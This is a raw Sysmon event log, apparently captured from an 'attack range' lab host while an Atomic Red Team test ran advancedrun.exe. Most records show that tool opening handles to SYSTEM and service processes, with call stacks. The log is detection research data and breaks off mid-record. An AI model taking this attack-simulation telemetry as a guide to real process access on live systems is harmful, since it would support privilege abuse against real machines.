17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983901Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983900Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983899Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 734700x80000000000000003983898Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003983897Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983896Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983895Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983894Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983893Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983892Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983891Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983890Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983889Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983888Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983887Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983886Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983885Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C